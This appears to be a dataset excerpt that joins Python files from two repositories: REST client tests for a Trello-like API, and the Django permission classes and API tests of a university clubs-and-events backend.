self.expect('GET', '/notifications/1234/member', {'fields': 'id,name'})
self.service.notification('1234').member().field('name')
self.expect('GET', '/notifications/1234/member/name', {})
self.service.notification('1234').creator().get()
self.expect('GET', '/notifications/1234/memberCreator', {})
self.service.notification('1').creator().get(fields=['id'])
self.expect('GET', '/notifications/1/memberCreator', {'fields': 'id'})
self.service.notification('1234').creator().field('name')
self.expect('GET', '/notifications/1234/memberCreator/name', {})
self.service.notification('1234').organization().get()
self.expect('GET', '/notifications/1234/organization', {})
self.service.notification('1').organization().get(fields=['id'])
self.expect('GET', '/notifications/1/organization', {'fields': 'id'})
self.service.notification('1234').organization().field('name')
self.expect('GET', '/notifications/1234/organization/name', {})
obj = {'foo': 'bar'}
self.service.notification('1234').update(obj)
self.expect('PUT', '/notifications/1234', json.dumps(obj))
def test_organizations(self):
self.service.organization('1234').get()
self.expect('GET', '/organizations/1234', {})
self.service.organization('1234').get(fields=['id'])
self.expect('GET', '/organizations/1234', {'fields': 'id'})
self.service.organization('1234').get(fields=['id', 'name'])
self.expect('GET', '/organizations/1234', {'fields': 'id,name'})
self.service.organization('1234').get(member=True)
self.expect('GET', '/organizations/1234', {'member': 'true'})
self.service.organization('1234').field('name')
self.expect('GET', '/organizations/1234/name', {})
self.service.organization('1234').actions().get()
self.expect('GET', '/organizations/1234/actions', {})
self.service.organization('1234').actions().get(limit=10)
self.expect('GET', '/organizations/1234/actions', {'limit': 10})
self.service.organization('1234').boards().get()
self.expect('GET', '/organizations/1234/boards', {})
self.service.organization('1234').boards().get(limit=10)
self.expect('GET', '/organizations/1234/boards', {'limit': 10})
self.service.organization('1234').boards().filter('closed')
self.expect('GET', '/organizations/1234/boards/closed', {})
self.service.organization('1234').members().get()
self.expect('GET', '/organizations/1234/members', {})
self.service.organization('1234').members().get(limit=10)
self.expect('GET', '/organizations/1234/members', {'limit': 10})
self.service.organization('1234').members().filter('normal')
self.expect('GET', '/organizations/1234/members/normal', {})
self.service.organization('1234').members_invited().get()
self.expect('GET', '/organizations/1234/membersInvited', {})
self.service.organization('1').members_invited().get(fields=['id'])
self.expect('GET', '/organizations/1/membersInvited', {'fields': 'id'})
self.service.organization('1234').memberships().get()
self.expect('GET', '/organizations/1234/memberships', {})
self.service.organization('1234').memberships().get(limit=10)
self.expect('GET', '/organizations/1234/memberships', {'limit': 10})
self.service.organization('1234').membership('1234').get()
self.expect('GET', '/organizations/1234/memberships/1234', {})
obj = {'foo': 'bar'}
self.service.organizations().create(obj)
self.expect('POST', '/organizations', json.dumps(obj))
self.service.organization('1234').update(obj)
self.expect('PUT', '/organizations/1234', json.dumps(obj))
self.service.organization('1234').member('1234').update(obj)
self.expect('PUT', '/organizations/1234/members/1234', json.dumps(obj))
self.service.organization('1').membership('2').update(obj)
self.expect('PUT', '/organizations/1/memberships/2', json.dumps(obj))
self.service.organization('1234').delete()
self.expect('DELETE', '/organizations/1234')
self.service.organization('1234').member('1234').delete()
self.expect('DELETE', '/organizations/1234/members/1234')
self.service.organization('1234').membership('1234').delete()
self.expect('DELETE', '/organizations/1234/memberships/1234')
``` |
{
"source": "810Teams/clubs-and-events-backend",
"score": 2
} |
#### File: clubs-and-events-backend/asset/permissions.py
```python
from django.utils import timezone
from rest_framework import permissions
from asset.models import Announcement, Comment, Album, AlbumImage
from clubs_and_events.settings import COMMENT_DELETE_TIME
from core.permissions import IsInPubliclyVisibleCommunity, IsMemberOfCommunity, IsDeputyLeaderOfCommunity
class IsAbleToRetrieveAnnouncement(permissions.BasePermission):
''' Main permission of GET request of Announcement '''
def has_object_permission(self, request, view, obj):
''' Check permission on object '''
if isinstance(obj, Announcement):
if IsMemberOfCommunity().has_object_permission(request, view, obj):
return True
elif IsInPubliclyVisibleCommunity().has_object_permission(request, view, obj) and obj.is_publicly_visible:
return True
return False
class IsAbleToRetrieveAlbum(permissions.BasePermission):
''' Main permission of GET request of Album '''
def has_object_permission(self, request, view, obj):
''' Check permission on object '''
if isinstance(obj, Album):
if IsMemberOfCommunity().has_object_permission(request, view, obj):
return True
elif obj.community_event is not None \
and IsMemberOfCommunity().has_object_permission(request, view, obj.community_event):
return True
elif IsInPubliclyVisibleCommunity().has_object_permission(request, view, obj) and obj.is_publicly_visible:
return True
return False
class IsAbleToRetrieveAlbumImage(permissions.BasePermission):
''' Main permission of GET request of AlbumImage '''
def has_object_permission(self, request, view, obj):
''' Check permission on object '''
if isinstance(obj, AlbumImage):
return IsAbleToRetrieveAlbum().has_object_permission(request, view, obj.album)
return False
class IsAbleToDeleteComment(permissions.BasePermission):
''' Main permission of DELETE request of Comment '''
def has_object_permission(self, request, view, obj):
''' Check permission on object '''
if isinstance(obj, Comment):
if obj.created_by is not None and obj.created_by.id == request.user.id \
and obj.created_at + COMMENT_DELETE_TIME > timezone.now():
return True
elif IsDeputyLeaderOfCommunity().has_object_permission(request, view, obj):
return True
return False
```
#### File: clubs-and-events-backend/category/tests.py
```python
from rest_framework import status
from rest_framework.test import APITestCase
from category.models import ClubType, EventType, EventSeries
class ClubTypeAPITest(APITestCase):
''' Club type API test '''
def setUp(self):
''' Set up '''
self.academic = ClubType.objects.create(title_th='วิชาการ', title_en='Academic')
self.arts = ClubType.objects.create(title_th='ศิลปะ', title_en='Arts')
self.culture = ClubType.objects.create(title_th='วัฒนธรรมและภาษา', title_en='Culture and Language')
self.entertainment = ClubType.objects.create(title_th='บันเทิง', title_en='Entertainment')
self.sports = ClubType.objects.create(title_th='กีฬา', title_en='Sports')
self.travel = ClubType.objects.create(title_th='ท่องเที่ยว', title_en='Travel')
def test_list_club_type(self):
''' Test list club type '''
response = self.client.get('/api/category/club-type/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 6)
def test_retrieve_club_type(self):
''' Test retrieve club type '''
response = self.client.get('/api/category/club-type/{}/'.format(self.academic.id))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('title_th', response.data.keys())
self.assertIn('title_en', response.data.keys())
def test_create_club_type(self):
''' Test create club type '''
response = self.client.post('/api/category/club-type/', {
'title_th': 'ไม่ได้ตั้งชื่อ',
'title_en': 'Unnamed'
})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_club_type(self):
''' Test update club type '''
response = self.client.put('/api/category/club-type/{}/'.format(self.academic.id), {
'title_th': 'ไม่ได้ตั้งชื่อ',
'title_en': 'Unnamed'
})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
response = self.client.patch('/api/category/club-type/{}/'.format(self.academic.id), {
'title_th': 'ไม่ได้ตั้งชื่อ',
'title_en': 'Unnamed'
})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_delete_club_type(self):
''' Test delete club type '''
response = self.client.delete('/api/category/club-type/{}/'.format(self.academic.id))
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
class EventTypeAPITest(APITestCase):
''' Event type API test '''
def setUp(self):
''' Set up '''
self.academic = EventType.objects.create(title_th='วิชาการ', title_en='Academic')
self.arts = EventType.objects.create(title_th='ศิลปะ', title_en='Arts')
self.culture = EventType.objects.create(title_th='วัฒนธรรมและภาษา', title_en='Culture and Language')
self.entertainment = EventType.objects.create(title_th='บันเทิง', title_en='Entertainment')
self.sports = EventType.objects.create(title_th='กีฬา', title_en='Sports')
self.travel = EventType.objects.create(title_th='ท่องเที่ยว', title_en='Travel')
def test_list_event_type(self):
''' Test list event type '''
response = self.client.get('/api/category/event-type/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 6)
def test_retrieve_event_type(self):
''' Test retrieve event type '''
response = self.client.get('/api/category/event-type/{}/'.format(self.academic.id))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('title_th', response.data.keys())
self.assertIn('title_en', response.data.keys())
def test_create_event_type(self):
''' Test create event type '''
response = self.client.post('/api/category/event-type/', {
'title_th': 'ไม่ได้ตั้งชื่อ',
'title_en': 'Unnamed'
})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_event_type(self):
''' Test update event type '''
response = self.client.put('/api/category/event-type/{}/'.format(self.academic.id), {
'title_th': 'ไม่ได้ตั้งชื่อ',
'title_en': 'Unnamed'
})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
response = self.client.patch('/api/category/event-type/{}/'.format(self.academic.id), {
'title_th': 'ไม่ได้ตั้งชื่อ',
'title_en': 'Unnamed'
})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_delete_event_type(self):
''' Test delete event type '''
response = self.client.delete('/api/category/event-type/{}/'.format(self.academic.id))
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
class EventSeriesAPITest(APITestCase):
''' Event series API test '''
def setUp(self):
''' Set up '''
self.to_be_it = EventSeries.objects.create(title_th='ทูบีไอที ติวน้องสอบตรงไอทีลาดกระบัง', title_en='ToBeIT@KMITL')
self.oph = EventSeries.objects.create(title_th='เปิดบ้านไอทีลาดกระบัง', title_en='ITLadkrabang OpenHouse')
self.pre_pro = EventSeries.objects.create(title_th='พรีโปรแกรมมิ่ง', title_en='Pre-Programming')
def test_list_event_series(self):
''' Test list event series '''
response = self.client.get('/api/category/event-series/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 3)
def test_retrieve_event_series(self):
''' Test retrieve event series '''
response = self.client.get('/api/category/event-series/{}/'.format(self.to_be_it.id))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('title_th', response.data.keys())
self.assertIn('title_en', response.data.keys())
def test_create_event_series(self):
''' Test create event series '''
response = self.client.post('/api/category/event-series/', {
'title_th': 'ไม่ได้ตั้งชื่อ',
'title_en': 'Unnamed'
})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_event_series(self):
''' Test update event series '''
response = self.client.put('/api/category/event-series/{}/'.format(self.to_be_it.id), {
'title_th': 'ไม่ได้ตั้งชื่อ',
'title_en': 'Unnamed'
})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
response = self.client.patch('/api/category/event-series/{}/'.format(self.to_be_it.id), {
'title_th': 'ไม่ได้ตั้งชื่อ',
'title_en': 'Unnamed'
})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_delete_event_series(self):
''' Test delete event series '''
response = self.client.delete('/api/category/event-series/{}/'.format(self.to_be_it.id))
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
```
#### File: clubs-and-events-backend/community/tests.py
```python
from django.contrib.auth import get_user_model
from rest_framework import status
from rest_framework.test import APITestCase
from community.models import Community, Club, Event, CommunityEvent, Lab
from core.utils.general import get_random_string
from membership.models import Membership
import datetime
class CommunityAPITest(APITestCase):
''' Community API test '''
def setUp(self):
''' Set up '''
self.user_01 = get_user_model().objects.create_user(username='user_01', password='<PASSWORD>', name='User One')
self.user_02 = get_user_model().objects.create_user(username='user_02', password='<PASSWORD>', name='User Two')
self.user_03 = get_user_model().objects.create_user(username='user_03', password='<PASSWORD>', name='User Three')
self.user_04 = get_user_model().objects.create_user(username='user_04', password='<PASSWORD>', name='User Four')
self.user_05 = get_user_model().objects.create_user(username='user_05', password='<PASSWORD>', name='User Five')
self.lecturer_01 = get_user_model().objects.create_user(
username='lecturer_01', password='<PASSWORD>', name='Prof.Lazy Bones', user_group='lecturer'
)
self.lecturer_02 = get_user_model().objects.create_user(
username='lecturer_02', password='<PASSWORD>', name='Prof.Lazy Ass', user_group='lecturer'
)
self.support_staff = get_user_model().objects.create_user(
username='support', password='<PASSWORD>', name='Mr.Supporter', user_group='support'
)
self.club_public = Club.objects.create(
name_th='ชุมนุมทดสอบสังคม สาธารณะ', name_en='Community Testing Club (Public)',
is_publicly_visible=True, is_official=True, valid_through=datetime.date(2099, 7, 31)
)
self.club_private = Club.objects.create(
name_th='ชุมนุมทดสอบสังคม ส่วนตัว', name_en='Community Testing Club (Private)',
is_publicly_visible=False, is_official=False
)
self.event = Event.objects.create(
name_th='กิจกรรมทดสอบสังคม',
name_en='Advisory Testing Event',
is_approved=True,
location='L207 IT KMITL',
start_date=datetime.date(2020, 12, 1),
end_date=datetime.date(2020, 12, 2),
start_time=datetime.time(9, 0, 0),
end_time=datetime.time(17, 0, 0),
is_publicly_visible=False
)
self.event_unapproved = Event.objects.create(
name_th='กิจกรรมทดสอบสังคม (ยังไม่ได้รับการอนุมัติ)',
name_en='Advisory Testing Event (Unapproved)',
is_approved=False,
location='L207 IT KMITL',
start_date=datetime.date(2020, 12, 1),
end_date=datetime.date(2020, 12, 2),
start_time=datetime.time(9, 0, 0),
end_time=datetime.time(17, 0, 0),
is_publicly_visible=False
)
self.lab = Lab.objects.create(name_th='ห้องปฏิบัติการทดสอบสังคม', name_en='Community Testing Lab')
self.community_event = CommunityEvent.objects.create(
name_th='กิจกรรมชุมนุมทดสอบสังคม',
name_en='Community Testing Club Event',
is_approved=True,
location='L207 IT KMITL',
start_date=datetime.date(2020, 12, 1),
end_date=datetime.date(2020, 12, 2),
start_time=datetime.time(9, 0, 0),
end_time=datetime.time(17, 0, 0),
created_under_id=self.club_public.id,
is_publicly_visible=False
)
Membership.objects.create(community_id=self.club_public.id, user_id=self.user_01.id, position=3)
Membership.objects.create(community_id=self.club_public.id, user_id=self.user_02.id, position=2)
Membership.objects.create(community_id=self.club_public.id, user_id=self.user_03.id, position=1)
Membership.objects.create(community_id=self.club_public.id, user_id=self.user_04.id, position=0)
Membership.objects.create(community_id=self.club_private.id, user_id=self.user_01.id, position=3)
Membership.objects.create(community_id=self.club_private.id, user_id=self.user_02.id, position=2)
Membership.objects.create(community_id=self.club_private.id, user_id=self.user_03.id, position=1)
Membership.objects.create(community_id=self.club_private.id, user_id=self.user_04.id, position=0)
Membership.objects.create(community_id=self.event.id, user_id=self.user_01.id, position=3)
Membership.objects.create(community_id=self.event.id, user_id=self.user_02.id, position=2)
Membership.objects.create(community_id=self.event.id, user_id=self.user_03.id, position=1)
Membership.objects.create(community_id=self.event.id, user_id=self.user_04.id, position=0)
Membership.objects.create(community_id=self.event_unapproved.id, user_id=self.user_01.id, position=3)
Membership.objects.create(community_id=self.event_unapproved.id, user_id=self.user_02.id, position=2)
Membership.objects.create(community_id=self.event_unapproved.id, user_id=self.user_03.id, position=1)
Membership.objects.create(community_id=self.event_unapproved.id, user_id=self.user_04.id, position=0)
Membership.objects.create(community_id=self.community_event.id, user_id=self.user_01.id, position=3)
Membership.objects.create(community_id=self.community_event.id, user_id=self.user_02.id, position=2)
Membership.objects.create(community_id=self.community_event.id, user_id=self.user_03.id, position=1)
Membership.objects.create(community_id=self.community_event.id, user_id=self.user_04.id, position=0)
Membership.objects.create(community_id=self.lab.id, user_id=self.lecturer_01.id, position=3)
Membership.objects.create(community_id=self.lab.id, user_id=self.lecturer_02.id, position=2)
Membership.objects.create(community_id=self.lab.id, user_id=self.user_03.id, position=1)
Membership.objects.create(community_id=self.lab.id, user_id=self.user_04.id, position=0)
def test_list_community_authenticated(self):
''' Test list community authenticated '''
self.client.login(username='user_05', password='<PASSWORD>')
self._test_list_community(instance_path='club', expected_length=2)
self._test_list_community(instance_path='event', expected_length=3)
self._test_list_community(instance_path='event/community', expected_length=1)
self._test_list_community(instance_path='lab', expected_length=1)
self.client.logout()
def test_list_community_unauthenticated(self):
''' Test list community unauthenticated '''
self._test_list_community(instance_path='club', expected_length=1)
self._test_list_community(instance_path='event', expected_length=0)
self._test_list_community(instance_path='event/community', expected_length=0)
self._test_list_community(instance_path='lab', expected_length=0)
def _test_list_community(self, instance_path='club', expected_length=0):
''' Test list community '''
response = self.client.get('/api/community/{}/'.format(instance_path))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), expected_length)
def test_retrieve_community_authenticated(self):
''' Test retrieve community authenticated '''
self.client.login(username='user_05', password='<PASSWORD>')
self._test_retrieve_community(instance_path='club', instance_id=self.club_public.id, allows_retrieve=True)
self._test_retrieve_community(instance_path='club', instance_id=self.club_private.id, allows_retrieve=True)
self._test_retrieve_community(instance_path='event', instance_id=self.event.id, allows_retrieve=True)
self._test_retrieve_community(
instance_path='event/community', instance_id=self.community_event.id, allows_retrieve=True
)
self._test_retrieve_community(instance_path='lab', instance_id=self.lab.id, allows_retrieve=True)
self.client.logout()
def test_retrieve_community_unauthenticated(self):
''' Test retrieve community unauthenticated '''
self._test_retrieve_community(instance_path='club', instance_id=self.club_public.id, allows_retrieve=True)
self._test_retrieve_community(instance_path='club', instance_id=self.club_private.id, allows_retrieve=False)
self._test_retrieve_community(instance_path='event', instance_id=self.event.id, allows_retrieve=False)
self._test_retrieve_community(
instance_path='event/community', instance_id=self.community_event.id, allows_retrieve=False
)
self._test_retrieve_community(instance_path='lab', instance_id=self.lab.id, allows_retrieve=False)
def _test_retrieve_community(self, instance_path='club', instance_id=0, allows_retrieve=False):
''' Test retrieve community '''
response = self.client.get('/api/community/{}/{}/'.format(instance_path, instance_id))
if allows_retrieve:
self.assertEqual(response.status_code, status.HTTP_200_OK)
else:
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_retrieve_community_event_under_non_publicly_visible_community(self):
''' Test retrieve community event under non-publicly visible community '''
club = Club.objects.create(
name_th='ชุมนุมนอน', name_en='Sleeping Club', is_publicly_visible=False, is_official=True
)
community_event = CommunityEvent.objects.create(
name_th='นิทรรศการเตียงนอน',
name_en='Bed Fair',
is_approved=True,
location='Somewhere undecided',
start_date=datetime.date(2020, 12, 1),
end_date=datetime.date(2020, 12, 2),
start_time=datetime.time(9, 0, 0),
end_time=datetime.time(17, 0, 0),
created_under_id=club.id,
is_publicly_visible=True
)
# Unauthenticated
response = self.client.get('/api/community/club/{}/'.format(club.id))
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
response = self.client.get('/api/community/event/community/{}/'.format(community_event.id))
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# Authenticated
self.client.login(username='user_05', password='<PASSWORD>')
response = self.client.get('/api/community/club/{}/'.format(club.id))
self.assertEqual(response.status_code, status.HTTP_200_OK)
response = self.client.get('/api/community/event/community/{}/'.format(community_event.id))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.client.logout()
def test_create_club(self):
''' Test create club '''
self._test_create_community(username='user_05', instance_path='club', allows_create=True)
self._test_create_community(username='lecturer_02', instance_path='club', allows_create=False)
self._test_create_community(username='support', instance_path='club', allows_create=False)
self._test_create_community(username=str(), instance_path='club', allows_create=False)
def test_create_event(self):
''' Test create event '''
self._test_create_community(username='user_05', instance_path='event', allows_create=True)
self._test_create_community(username='lecturer_01', instance_path='event', allows_create=True)
self._test_create_community(username='support', instance_path='event', allows_create=True)
self._test_create_community(username=str(), instance_path='event', allows_create=False)
def test_create_community_event_under_official_club(self):
''' Test create community event under official club '''
self._test_create_community(
username='user_01', instance_path='event/community', created_under=self.club_public.id, allows_create=True
)
self._test_create_community(
username='user_02', instance_path='event/community', created_under=self.club_public.id, allows_create=True
)
self._test_create_community(
username='user_03', instance_path='event/community', created_under=self.club_public.id, allows_create=True
)
self._test_create_community(
username='user_04', instance_path='event/community', created_under=self.club_public.id, allows_create=False
)
self._test_create_community(
username='user_05', instance_path='event/community', created_under=self.club_public.id, allows_create=False
)
self._test_create_community(
username=str(), instance_path='event/community', created_under=self.club_public.id, allows_create=False
)
def test_create_community_event_under_unofficial_club(self):
''' Test create community event under unofficial club '''
self._test_create_community(
username='user_01', instance_path='event/community', created_under=self.club_private.id, allows_create=False
)
self._test_create_community(
username='user_02', instance_path='event/community', created_under=self.club_private.id, allows_create=False
)
self._test_create_community(
username='user_03', instance_path='event/community', created_under=self.club_private.id, allows_create=False
)
self._test_create_community(
username='user_04', instance_path='event/community', created_under=self.club_private.id, allows_create=False
)
self._test_create_community(
username='user_05', instance_path='event/community', created_under=self.club_private.id, allows_create=False
)
self._test_create_community(
username=str(), instance_path='event/community', created_under=self.club_private.id, allows_create=False
)
def test_create_community_event_under_event(self):
''' Test create community event under event '''
self._test_create_community(
username='user_01', instance_path='event/community', created_under=self.event.id, allows_create=False
)
self._test_create_community(
username='user_02', instance_path='event/community', created_under=self.event.id, allows_create=False
)
self._test_create_community(
username='user_03', instance_path='event/community', created_under=self.event.id, allows_create=False
)
self._test_create_community(
username='user_04', instance_path='event/community', created_under=self.event.id, allows_create=False
)
self._test_create_community(
username='user_05', instance_path='event/community', created_under=self.event.id, allows_create=False
)
self._test_create_community(
username=str(), instance_path='event/community', created_under=self.event.id, allows_create=False
)
def test_create_community_event_under_community_event(self):
''' Test create community event under event '''
self._test_create_community(
username='user_01', instance_path='event/community',
created_under=self.community_event.id, allows_create=False
)
self._test_create_community(
username='user_02', instance_path='event/community',
created_under=self.community_event.id, allows_create=False
)
self._test_create_community(
username='user_03', instance_path='event/community',
created_under=self.community_event.id, allows_create=False
)
self._test_create_community(
username='user_04', instance_path='event/community',
created_under=self.community_event.id, allows_create=False
)
self._test_create_community(
username='user_05', instance_path='event/community',
created_under=self.community_event.id, allows_create=False
)
self._test_create_community(
username=str(), instance_path='event/community',
created_under=self.community_event.id, allows_create=False
)
def test_create_community_event_under_lab(self):
''' Test create community event under event '''
self._test_create_community(
username='lecturer_01', instance_path='event/community', created_under=self.lab.id, allows_create=True
)
self._test_create_community(
username='lecturer_02', instance_path='event/community', created_under=self.lab.id, allows_create=True
)
self._test_create_community(
username='user_03', instance_path='event/community', created_under=self.lab.id, allows_create=True
)
self._test_create_community(
username='user_04', instance_path='event/community', created_under=self.lab.id, allows_create=False
)
self._test_create_community(
username='user_05', instance_path='event/community', created_under=self.lab.id, allows_create=False
)
self._test_create_community(
username=str(), instance_path='event/community', created_under=self.lab.id, allows_create=False
)
def test_create_lab(self):
''' Test create lab '''
self._test_create_community(username='user_05', instance_path='lab', allows_create=False)
self._test_create_community(username='lecturer_01', instance_path='lab', allows_create=True)
self._test_create_community(username='support', instance_path='lab', allows_create=False)
self._test_create_community(username=str(), instance_path='lab', allows_create=False)
def _test_create_community(self, username=str(), instance_path='club', created_under=int(), allows_create=True):
''' Test create community '''
if username.strip() != str():
self.client.login(username=username, password='<PASSWORD>')
response = self.client.post('/api/community/{}/'.format(instance_path), {
'name_th': 'สังคมใหม่ โดย {}'.format(username),
'name_en': 'New Community by {}'.format(username),
'location': '-',
'start_date': '2021-01-01',
'end_date': '2021-01-02',
'start_time': '08:15:00',
'end_time': '15:45:00',
'created_under': created_under
})
if allows_create:
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(
len(Membership.objects.filter(
user_id=get_user_model().objects.get(username=username),
community_id=response.data['id'],
position=3,
status='A'
)), 1
)
else:
self.assertIn(response.status_code, (status.HTTP_400_BAD_REQUEST, status.HTTP_403_FORBIDDEN))
if username.strip() != str():
self.client.logout()
def test_update_club(self):
''' Test update club '''
self._test_update_community(
username='user_01', community_id=self.club_public.id, instance_path='club', allows_update=True
)
self._test_update_community(
username='user_02', community_id=self.club_public.id, instance_path='club', allows_update=True
)
self._test_update_community(
username='user_03', community_id=self.club_public.id, instance_path='club', allows_update=False
)
self._test_update_community(
username='user_04', community_id=self.club_public.id, instance_path='club', allows_update=False
)
self._test_update_community(
username='user_05', community_id=self.club_public.id, instance_path='club', allows_update=False
)
self._test_update_community(
username=str(), community_id=self.club_public.id, instance_path='club', allows_update=False
)
def test_update_event(self):
''' Test update event'''
self._test_update_community(
username='user_01', community_id=self.event.id, instance_path='event', allows_update=True
)
self._test_update_community(
username='user_02', community_id=self.event.id, instance_path='event', allows_update=True
)
self._test_update_community(
username='user_03', community_id=self.event.id, instance_path='event', allows_update=False
)
self._test_update_community(
username='user_04', community_id=self.event.id, instance_path='event', allows_update=False
)
self._test_update_community(
username='user_05', community_id=self.event.id, instance_path='event', allows_update=False
)
self._test_update_community(
username=str(), community_id=self.event.id, instance_path='event', allows_update=False
)
def test_update_community_event(self):
''' Test update community event '''
self._test_update_community(
username='user_01', community_id=self.community_event.id,
instance_path='event/community', allows_update=True
)
self._test_update_community(
username='user_02', community_id=self.community_event.id,
instance_path='event/community', allows_update=True
)
self._test_update_community(
username='user_03', community_id=self.community_event.id,
instance_path='event/community', allows_update=False
)
self._test_update_community(
username='user_04', community_id=self.community_event.id,
instance_path='event/community', allows_update=False
)
self._test_update_community(
username='user_05', community_id=self.community_event.id,
instance_path='event/community', allows_update=False
)
self._test_update_community(
username=str(), community_id=self.community_event.id,
instance_path='event/community', allows_update=False
)
def test_update_lab(self):
''' Test update lab '''
self._test_update_community(
username='lecturer_01', community_id=self.lab.id, instance_path='lab', allows_update=True
)
self._test_update_community(
username='lecturer_02', community_id=self.lab.id, instance_path='lab', allows_update=True
)
self._test_update_community(
username='user_03', community_id=self.lab.id, instance_path='lab', allows_update=False
)
self._test_update_community(
username='user_04', community_id=self.lab.id, instance_path='lab', allows_update=False
)
self._test_update_community(
username='user_05', community_id=self.lab.id, instance_path='lab', allows_update=False
)
self._test_update_community(
username=str(), community_id=self.lab.id, instance_path='lab', allows_update=False
)
def _test_update_community(self, username=str(), community_id=int(), instance_path='club', allows_update=True):
''' Test update community '''
if username.strip() != str():
self.client.login(username=username, password='<PASSWORD>')
description = get_random_string(length=64)
response = self.client.patch('/api/community/{}/{}/'.format(instance_path, community_id), {
'description': description
})
if allows_update:
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(Community.objects.get(pk=community_id).description, description)
else:
self.assertIn(response.status_code, (status.HTTP_400_BAD_REQUEST, status.HTTP_403_FORBIDDEN))
if username.strip() != str():
self.client.logout()
def test_delete_community_as_leader(self):
''' Test delete community as leader '''
self._test_delete_community(
username='user_01', community_id=self.community_event.id,
instance_path='event/community', allows_delete=True
)
self._test_delete_community(
username='user_01', community_id=self.club_public.id,
instance_path='club', allows_delete=True
)
self._test_delete_community(
username='user_01', community_id=self.club_private.id,
instance_path='club', allows_delete=True
)
self._test_delete_community(
username='user_01', community_id=self.event.id,
instance_path='event', allows_delete=True
)
self._test_delete_community(
username='user_01', community_id=self.event_unapproved.id,
instance_path='event', allows_delete=True
)
self._test_delete_community(
username='lecturer_01', community_id=self.lab.id,
instance_path='lab', allows_delete=True
)
def test_delete_community_as_deputy_leader(self):
''' Test delete community as deputy leader '''
self._test_delete_community(
username='user_02', community_id=self.community_event.id,
instance_path='event/community', allows_delete=False
)
self._test_delete_community(
username='user_02', community_id=self.club_public.id,
instance_path='club', allows_delete=False
)
self._test_delete_community(
username='user_02', community_id=self.club_private.id,
instance_path='club', allows_delete=False
)
self._test_delete_community(
username='user_02', community_id=self.event.id,
instance_path='event', allows_delete=False
)
self._test_delete_community(
username='user_02', community_id=self.event_unapproved.id,
instance_path='event', allows_delete=False
)
self._test_delete_community(
username='lecturer_02', community_id=self.lab.id,
instance_path='lab', allows_delete=False
)
def test_delete_community_as_staff(self):
''' Test delete community as staff '''
self._test_delete_community(
username='user_03', community_id=self.community_event.id,
instance_path='event/community', allows_delete=False
)
self._test_delete_community(
username='user_03', community_id=self.club_public.id,
instance_path='club', allows_delete=False
)
self._test_delete_community(
username='user_03', community_id=self.club_private.id,
instance_path='club', allows_delete=False
)
self._test_delete_community(
username='user_03', community_id=self.event.id,
instance_path='event', allows_delete=False
)
self._test_delete_community(
username='user_03', community_id=self.event_unapproved.id,
instance_path='event', allows_delete=False
)
self._test_delete_community(
username='user_03', community_id=self.lab.id,
instance_path='lab', allows_delete=False
)
def test_delete_community_as_member(self):
''' Test delete community as member '''
self._test_delete_community(
username='user_04', community_id=self.community_event.id,
instance_path='event/community', allows_delete=False
)
self._test_delete_community(
username='user_04', community_id=self.club_public.id,
instance_path='club', allows_delete=False
)
self._test_delete_community(
username='user_04', community_id=self.club_private.id,
instance_path='club', allows_delete=False
)
self._test_delete_community(
username='user_04', community_id=self.event.id,
instance_path='event', allows_delete=False
)
self._test_delete_community(
username='user_04', community_id=self.event_unapproved.id,
instance_path='event', allows_delete=False
)
self._test_delete_community(
username='user_04', community_id=self.lab.id,
instance_path='lab', allows_delete=False
)
def test_delete_community_as_non_member(self):
''' Test delete community as non-member '''
self._test_delete_community(
username='user_05', community_id=self.community_event.id,
instance_path='event/community', allows_delete=False
)
self._test_delete_community(
username='user_05', community_id=self.club_public.id,
instance_path='club', allows_delete=False
)
self._test_delete_community(
username='user_05', community_id=self.club_private.id,
instance_path='club', allows_delete=False
)
self._test_delete_community(
username='user_05', community_id=self.event.id,
instance_path='event', allows_delete=False
)
self._test_delete_community(
username='user_05', community_id=self.event_unapproved.id,
instance_path='event', allows_delete=False
)
self._test_delete_community(
username='user_05', community_id=self.lab.id,
instance_path='lab', allows_delete=False
)
def test_delete_community_unauthenticated(self):
''' Test delete community while unauthenticated '''
self._test_delete_community(
username=str(), community_id=self.community_event.id, instance_path='event/community', allows_delete=False
)
self._test_delete_community(
username=str(), community_id=self.club_public.id, instance_path='club', allows_delete=False
)
self._test_delete_community(
username=str(), community_id=self.club_private.id, instance_path='club', allows_delete=False
)
self._test_delete_community(
username=str(), community_id=self.event.id, instance_path='event', allows_delete=False
)
self._test_delete_community(
username=str(), community_id=self.event_unapproved.id, instance_path='event', allows_delete=False
)
self._test_delete_community(
username=str(), community_id=self.lab.id, instance_path='lab', allows_delete=False
)
def test_delete_club_then_community_event(self):
''' Test delete club then community event '''
self._test_delete_community(
username='user_01', community_id=self.club_public.id,
instance_path='club', allows_delete=True
)
self._test_delete_community(
username='user_01', community_id=self.community_event.id,
instance_path='event/community', allows_delete=False
)
